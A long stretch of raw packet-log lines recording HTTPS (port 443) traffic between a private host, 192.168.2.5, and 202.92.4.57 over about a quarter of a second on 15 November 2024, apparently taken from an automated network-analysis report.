                                                                                                                                                                                                    Nov 15, 2024 09:00:18.093846083 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.093859911 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.093926907 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.125159979 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.125227928 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.125499964 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.125499964 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.125562906 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.127829075 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.132395983 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.132441044 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.132535934 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.132559061 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.132622957 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.132930994 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.132972002 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.133016109 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.133028030 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.133058071 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.133083105 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.189383030 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.189445972 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.189676046 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.189704895 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.189732075 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.189918041 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.192739964 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.192812920 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.193012953 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.193020105 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.193020105 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.193065882 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.193097115 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.193115950 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.193145990 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.193881989 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.193923950 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.193981886 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.194014072 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.194056034 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.195590973 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.195636988 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.195683002 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.195698023 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.195732117 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.196415901 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.196455956 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.196496010 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.196511030 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.196538925 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.196665049 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.196715117 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.196747065 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.196759939 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.196810007 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.196896076 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.196934938 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.196965933 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.196980000 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.197006941 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.197380066 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.197427034 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.197457075 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.197469950 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.197501898 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.198106050 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.198158979 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.198199034 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.198213100 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.198240995 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.198375940 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.198421955 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.198451042 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.198465109 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.198509932 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.198590040 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.198627949 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.198663950 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.198676109 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.198719025 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.198909998 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.198959112 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.198990107 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.199002028 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.199037075 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.199157953 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.199197054 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.199239969 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.199251890 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.199279070 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.199400902 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.199445963 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.199472904 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.199486017 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.199532032 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.199598074 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.199639082 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.199680090 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.199692011 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.199727058 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.200171947 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.200217009 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.200249910 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.200262070 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.200295925 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.200673103 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.200711012 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.200752020 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.200763941 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.200789928 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.200894117 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.200939894 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.200968027 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.200979948 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.201014042 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.201340914 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.201380014 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.201416016 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.201427937 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.201457024 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.207020044 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.207068920 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.207129955 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.207142115 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.207173109 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.207559109 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.207597971 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.207643032 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.207654953 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.207683086 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.207865953 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.207911968 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.207945108 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.207957983 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.207993984 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.208188057 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.208226919 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.208267927 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.208280087 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.208307981 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.208439112 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.208518982 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.208549976 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.208564043 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.208594084 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.208755016 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.208794117 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.208832026 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.208844900 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.208872080 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.209099054 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.209147930 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.209172010 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.209183931 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.209216118 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.209328890 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.209367037 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.209398985 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.209412098 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.209439993 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.209727049 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.209774017 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.209806919 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.209819078 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.209851980 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.209949970 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.209989071 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.210021973 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.210033894 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.210059881 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.210477114 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.210522890 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.210550070 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.210562944 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.210601091 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.210876942 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.210915089 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.210958958 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.210978985 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.211005926 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.253638983 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.253664017 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.253801107 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.253813982 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.253890991 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.253890991 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.253967047 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.254055023 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.254232883 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.254281044 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.254434109 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.254434109 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.254486084 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.254547119 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.306317091 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.306382895 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.306482077 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.306550026 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.306587934 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.306699991 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.306838036 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.306880951 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.306987047 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.307003021 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.307077885 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.310184956 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.310245991 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.310281038 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.310293913 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.310328007 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.310349941 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.311055899 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.311100006 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.311145067 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.311158895 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.311191082 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.311211109 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.312649965 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.312706947 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.312756062 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.312768936 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.312798977 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.312819004 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.314027071 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.314071894 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.314115047 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.314127922 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.314155102 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.314184904 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.314402103 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.314450026 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.314491987 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.314503908 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.314532995 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.314568043 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.314640999 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.314681053 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.314718962 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.314730883 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.314762115 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.314785004 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.315145969 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.315188885 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.315232038 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.315243959 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.315270901 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.315308094 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.315592051 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.315640926 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.315681934 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.315695047 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.315725088 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.315751076 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.315905094 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.315947056 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.315984011 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.315995932 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.316021919 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.316044092 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.316451073 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.316492081 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.316529036 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.316540956 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.316576958 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.316596985 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.316823959 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.316865921 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.316901922 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.316915035 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.316941977 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.316975117 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.317200899 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.317241907 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.317277908 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.317290068 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.317317009 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.317344904 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.317715883 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.317756891 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.317794085 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.317806005 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.317842007 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.317862034 CET49704443192.168.2.5202.92.4.57
